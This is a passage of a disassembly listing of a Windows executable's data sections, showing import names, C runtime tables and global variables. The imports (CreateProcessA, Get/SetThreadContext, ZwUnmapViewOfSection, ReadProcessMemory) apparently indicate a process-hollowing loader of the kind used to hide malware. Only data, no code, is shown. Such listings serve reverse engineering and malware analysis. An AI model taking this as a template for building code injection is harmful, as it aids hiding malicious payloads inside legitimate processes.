stru_408EC0 _msEH <0FFFFFFFFh, offset loc_406F86, offset loc_406F8A>
; DATA XREF: ___security_error_handler+5�o
align 10h
stru_408ED0 _msEH <0FFFFFFFFh, offset loc_4071C7, offset loc_4071CB>
; DATA XREF: ___convertcp+2�o
align 10h
dd 48h, 0Eh dup(0)
dd offset dword_40A200
dd offset dword_408F30
dd 2, 2 dup(0)
dword_408F30 dd 42F4h, 5BACh, 0dword_408F3C dd 2 dup(0) ; sub_404218:loc_40422B�o
dword_408F44 dd 0 ; sub_40425C:loc_40426F�o
dd 8F84h, 2 dup(0)
dd 94BAh, 8000h, 907Ch, 2 dup(0)
dd 94D6h, 80F8h, 5 dup(0)
dd 9084h, 9092h, 90A4h, 90B4h, 90C6h, 90DAh, 90EEh, 9100h
dd 9114h, 9128h, 913Ah, 914Ah, 9156h, 9164h, 9172h, 9188h
dd 919Eh, 91AAh, 91BCh, 91CEh, 91DEh, 91ECh, 91FAh, 9208h
dd 9214h, 9224h, 9232h, 9242h, 9250h, 9264h, 9278h, 9284h
dd 9294h, 92B0h, 92CAh, 92E2h, 92FCh, 9312h, 9322h, 933Ch
dd 934Eh, 935Ch, 9366h, 9372h, 937Eh, 938Ah, 93A0h, 93B0h
dd 93C2h, 93D8h, 93EAh, 93FAh, 940Ah, 9416h, 9430h, 9440h
dd 9456h, 946Ch, 9486h, 9498h, 94AAh, 0
dd 94C8h, 0
dd 724600EFh, 694C6565h, 72617262h, 1980079h, 50746547h
dd 41636F72h, 65726464h, 7373h, 6F4C0248h, 694C6461h, 72617262h
dd 4179h, 6956037Ch, 61757472h, 6575516Ch, 78457972h, 2AC0000h
aReadprocessmem db 'ReadProcessMemory',0
dw 1CDh
aGetthreadconte db 'GetThreadContext',0
align 2
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 10h
dd 65470177h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6956037Ah
dd 61757472h, 6F72506Ch, 74636574h, 7845h, 69560374h, 61757472h
dd 6C6C416Ch, 7845636Fh, 2C50000h, 75736552h, 6854656Dh
dd 64616572h, 2A90000h, 64616552h, 656C6946h, 15B0000h
dd 46746547h, 53656C69h, 657A69h, 7243004Dh, 65746165h
dd 656C6946h, 30C0041h
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 206h
aHeapalloc db 'HeapAlloc',0
dw 1AFh
aGetstartupinfo db 'GetStartupInfoA',0
db 8
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1DFh
aGetversionexa db 'GetVersionExA',0
dw 20Ah
aHeapdestroy db 'HeapDestroy',0
db 8
db 2, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 376h
aVirtualfree db 'VirtualFree',0
db 0Ch
db 2, 48h, 65h
aApfree db 'apFree',0
align 4
db 73h ; s
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 10h
db 2, 48h, 65h
aAprealloc db 'apReAlloc',0
dw 22Ch
aIsbadwriteptr db 'IsBadWritePtr',0
aP db '¯',0
aExitprocess db 'ExitProcess',0
db 4Fh ; O
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 4
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 94h ; ”
db 3, 57h, 72h
aItefile db 'iteFile',0
db 0B1h ; ±
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 60h ; `
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 10h
aA db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 87h ; ‡
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
dd 65530317h, 6E614874h, 43656C64h, 746E756Fh, 15E0000h
dd 46746547h, 54656C69h, 657079h, 654700F5h, 50434174h
dd 18B0000h, 4F746547h, 50434D45h, 0FC0000h, 43746547h
dd 666E4950h, 2CA006Fh, 556C7452h, 6E69776Eh, 21F0064h
aInterlockedexc db 'InterlockedExchange',0
dd 6956037Bh, 61757472h, 6575516Ch, 7972h, 654701B2h, 72745374h
dd 54676E69h, 41657079h, 26B0000h
aMultibytetowid db 'MultiByteToWideChar',0
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 23A0000h
dd 614D434Ch, 72745370h, 41676E69h, 23B0000h, 614D434Ch
dd 72745370h, 57676E69h, 2120000h, 70616548h, 657A6953h
dd 2970000h
aQueryperforman db 'QueryPerformanceCounter',0
db 0D5h ; Õ
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 10h
db 3Eh ; >
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 13Bh
aGetcurrentproc db 'GetCurrentProcessId',0
db 0C0h ; À
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 16Ch
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
dd 69560379h, 61757472h, 6F72506Ch, 74636574h, 1BB0000h
dd 53746547h, 65747379h, 666E496Dh, 454B006Fh, 4C454E52h
dd 642E3233h, 6C6Ch, 654D01DEh, 67617373h, 786F4265h, 53550041h
dd 32335245h, 6C6C642Eh, 48h dup(0)
_rdata ends
; Section 3. (virtual address 0000A000)
; Virtual size : 0003AF1C ( 241436.)
; Section size in file : 00000600 ( 1536.)
; Offset to raw data for section: 00008600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 40A000h
dword_40A000 dd 0 dd offset ___security_init_cookie
dd offset sub_4079E8
dd offset sub_407A05
dword_40A010 dd 0 dword_40A014 dd 0 dd offset ___onexitinit
dd offset ___initmbctable
dword_40A020 dd 0 dword_40A024 dd 0 dword_40A028 dd 0 dword_40A02C dd 0 dword_40A030 dd 4 dup(0) dword_40A040 dd 8C00h ; sub_4010CE+A9�r ...
align 10h
dd 9875h, 9873h
off_40A058 dd offset __fpmath ; DATA XREF: __cinit�r
dd offset nullsub_1
dd offset nullsub_1
off_40A064 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_40A068 dd 2 ; __FF_MSGBANNER+E�r
dd 10h
off_40A070 dd offset __fptrap ; DATA XREF: __cfltcvt_init+5�w
off_40A074 dd offset __fptrap ; DATA XREF: __cfltcvt_init+A�w
off_40A078 dd offset __fptrap ; DATA XREF: __cfltcvt_init+14�w
off_40A07C dd offset __fptrap ; DATA XREF: __cfltcvt_init+1E�w
off_40A080 dd offset __fptrap ; DATA XREF: __cfltcvt_init+28�w
off_40A084 dd offset __fptrap ; DATA XREF: __cfltcvt_init+32�w
dword_40A088 dd 2 ; __NMSG_WRITE+3A�r ...
off_40A08C dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 408664h, 9, 408638h, 0Ah, 4085A0h, 10h, 408574h
dd 11h, 408544h, 12h, 408520h, 13h, 4084F4h, 18h, 4084BCh
dd 19h, 408494h, 1Ah, 40845Ch, 1Bh, 408424h, 1Ch, 4083FCh
dd 1Dh, 408358h, 78h, 408348h, 79h, 408338h, 7Ah, 408328h
dd 0FCh, 408324h, 0FFh, 408314h
dword_40A120 dd 0C0000005h, 0Bh, 0 ; __XcptFilter+C�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_40A198 dd 3 dword_40A19C dd 7 dword_40A1A0 dd 0Ah ; __XcptFilter+6�r
dword_40A1A4 dd 8Ch ; __XcptFilter+BA�w ...
dd 0FFFFFFFFh, 0A80h
dword_40A1B0 dd 1 ; _tolower+36�r ...
byte_40A1B4 db 2Eh ; DATA XREF: __forcdecpt+40�r
; .text:0040323F�r ...
align 4
dd 1
off_40A1BC dd offset asc_408840 ; DATA XREF: __forcdecpt:loc_40320F�r
; .text:00404783�r ...
; " ((((( H"
off_40A1C0 dd offset word_408A42 ; DATA XREF: .text:0040477D�r
dword_40A1C4 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_40A1DC dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh, 3 dup(0)dword_40A200 dd 0BB40E64Eh ; sub_404CA3+6�r ...
align 8
byte_40A208 db 1 ; DATA XREF: __setmbcp+120�r
db 2, 4, 8
align 10h
dword_40A210 dd 3A4h dword_40A214 dd 82798260h dd 21h, 0
dword_40A220 dd 0DFA6h align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_40A300 dd 19930520h, 3 dup(0) ; __NLG_Notify+2�o
dword_40A310 dd 1 align 8
dword_40A318 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_40A478 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: ___multtenpow12+23�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 3 dup(0)
byte_40A5E0 db 0 ; DATA XREF: sub_4010CE+49�w
; sub_401334+2E�w ...
align 4
dword_40A5E4 dd 0 ; sub_4010CE+E�r ...
; HANDLE hFile
hFile dd 0 ; DATA XREF: sub_4017D8+23�w
; sub_4017D8+4C�r
byte_40A5EC db 0 ; DATA XREF: sub_4010CE+1B�w
; sub_4010CE+43�w ...
align 10h
; HANDLE hThread
hThread dd 0 ; DATA XREF: sub_40165D+150�w
; sub_4017C4�r
; struct _MEMORY_BASIC_INFORMATION Buffer
Buffer _MEMORY_BASIC_INFORMATION <?> ; DATA XREF: sub_40150A+4�o
; sub_401522+AF�r
dd 2 dup(?)
dword_40A618 dd ? byte_40A61C db ? ; DATA XREF: sub_4010CE+2B�w
; sub_4010CE+34�w ...
align 10h
byte_40A620 db ? ; DATA XREF: sub_401088+17�w
; sub_4010CE+85�o ...
dword_40A621 dd ? ; sub_4010CE+CC�r ...
align 4
dd 4 dup(?)
byte_40A638 db ? ; DATA XREF: sub_4010CE+BD�w
align 4
dd 9 dup(?)
byte_40A660 db ? ; DATA XREF: sub_4010CE+62�w
align 4
dd 27h dup(?)
byte_40A700 db ? ; DATA XREF: sub_4010CE+11B�w
align 4
dd 0E885h dup(?)
dword_444918 dd ? dword_44491C dd ? ; WinMain(x,x,x,x)+157�r
byte_444920 db ? ; DATA XREF: sub_4017C4+6�w
; WinMain(x,x,x,x)+165�w
align 4
; DWORD nNumberOfBytesToRead
nNumberOfBytesToRead dd ? ; DATA XREF: sub_4010CE+25�r
; sub_4017D8+2E�w ...
dword_444928 dd ? ; sub_40165D+74�w ...
dword_44492C dd ? ; resolved to->NTDLL.ZwUnmapViewOfSection ; sub_407A05+17�w
dword_444930 dd ? ; resolved to->KERNEL32.SetThreadContext ; sub_4079E8+17�w
dword_444934 dd ? ; .text:00401E2F�w
dword_444938 dd ? ; char *dword_44493C
dword_44493C dd ? ; __setenvp:loc_403C65�r ...
dd ?
dword_444944 dd ? ; .text:_fast_error_exit�r ...
dword_444948 dd ? ; .text:004031BA�w ...
; int dword_44494C
dword_44494C dd ? ; _realloc:loc_406E57�r ...
dword_444950 dd ? byte_444954 db ? ; DATA XREF: __cftoe+3�r __cftoe+8D�r ...
align 4
dword_444958 dd ? byte_44495C db ? ; DATA XREF: __cftog+57�w
align 10h
dd 3 dup(?)
dword_44496C dd ? dword_444970 dd ? dword_444974 dd ? dword_444978 dd ? ; ___heap_select+9�r ...
dword_44497C dd ? dword_444980 dd ? dword_444984 dd ? dd ?
; void *dword_44498C
dword_44498C dd ? ; __setenvp:loc_403D04�r ...
dd 3 dup(?)
dword_44499C dd ? dd ?
byte_4449A4 db ? ; DATA XREF: _doexit+2D�w
align 4
dword_4449A8 dd ? dword_4449AC dd ? dword_4449B0 dd ? dword_4449B4 dd ? ; __XcptFilter+73�w ...
; char Filename[]
Filename db 104h dup(?) ; DATA XREF: __setargv+1C�o
byte_444ABC db ? ; DATA XREF: __setargv+23�w
align 10h
dword_444AC0 dd ? ; ___crtGetEnvironmentStringsA+24�w ...
word_444AC4 dw ? ; DATA XREF: __fltout+1F�o __fltout+4D�r
byte_444AC6 db ? ; DATA XREF: __fltout+41�r
align 4
dword_444AC8 dd 6 dup(?) dword_444AE0 dd ? dword_444AE4 dd ? dword_444AE8 dd ? dword_444AEC dd ? dword_444AF0 dd ? ; ___crtMessageBoxA+38�w ...
dword_444AF4 dd ? ; ___crtMessageBoxA:loc_405466�r
dword_444AF8 dd ? ; ___crtMessageBoxA+D6�r
dword_444AFC dd ? ; ___crtMessageBoxA:loc_405421�r
dword_444B00 dd ? ; ___crtMessageBoxA+9C�r
dword_444B04 dd ? ; .text:0040571F�w ...
dword_444B08 dd ? ; __ValidateEH3RN+13F�r ...
align 10h
dword_444B10 dd ? ; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(?)
; volatile LONG Target
Target dd ? ; DATA XREF: __ValidateEH3RN+12C�o
; __ValidateEH3RN+191�o ...
dword_444B54 dd ? ; ___crtGetStringTypeA+2E�w ...
align 10h
; LCID Locale
Locale dd ? ; DATA XREF: __isctype+50�r _tolower+5�r ...
align 10h
; UINT dword_444B70
dword_444B70 dd ? ; _tolower+86�r ...
align 8
dword_444B78 dd ? ; ___crtLCMapStringA+31�w ...
dword_444B7C dd ? ; .text:004070A6�r ...
; LCID dword_444B80
dword_444B80 dd ? ; _setSBUpLow+84�r ...
dword_444B84 dd ? ; __setmbcp+14D�w ...
dd 6 dup(?)
byte_444BA0 db ? ; DATA XREF: _setSBCS+6�o __setmbcp+A7�o ...
byte_444BA1 db ? ; DATA XREF: _parse_cmdline+47�r
; _parse_cmdline+11D�r ...
align 4
dd 40h dup(?)
; UINT CodePage
CodePage dd ? ; DATA XREF: __ismbbkana�r _setSBCS+10�w ...
align 10h
dword_444CB0 dd 4 dup(?) ; __setmbcp+162�o ...
byte_444CC0 db ? ; DATA XREF: _setSBUpLow:loc_4058C3�w
; _setSBUpLow:loc_4058E0�w ...
align 4
dd 3Fh dup(?)
; UINT uNumber
uNumber dd ? ; DATA XREF: __ioinit+1F�w
; __ioinit:loc_4040D3�r ...
dd 7 dup(?)
dword_444DE0 dd ? ; __ioinit+3C�r ...
dword_444DE4 dd 3Fh dup(?) dword_444EE0 dd ? ; .text:0040420E�o
dword_444EE4 dd ? ; _doexit:loc_4037AA�r ...
; void *dword_444EE8
dword_444EE8 dd ? dword_444EEC dd ? ; __setenvp+3�r ...
dd ?
; void *dword_444EF4
dword_444EF4 dd ? ; ___sbh_free_block+21C�r ...
dword_444EF8 dd ? ; .text:00402205�r ...
; LPVOID lpMem
lpMem dd ? ; DATA XREF: .text:004021CB�r
; .text:loc_40220F�r ...
dword_444F00 dd ? ; __get_sbh_threshold+E�r ...
dword_444F04 dd ? ; ___sbh_free_block+300�w ...
dword_444F08 dd ? ; ___sbh_alloc_new_region+5�r ...
dword_444F0C dd ? ; ___sbh_free_block+249�r ...
; HANDLE hHeap
hHeap dd ? ; DATA XREF: __heap_alloc+38�r
; __heap_init+19�w ...
dword_444F14 dd ? ; __heap_alloc:loc_401A44�r ...
dword_444F18 dd ? ; __wincmdln:loc_403C07�r ...
align 100h
_data ends
end start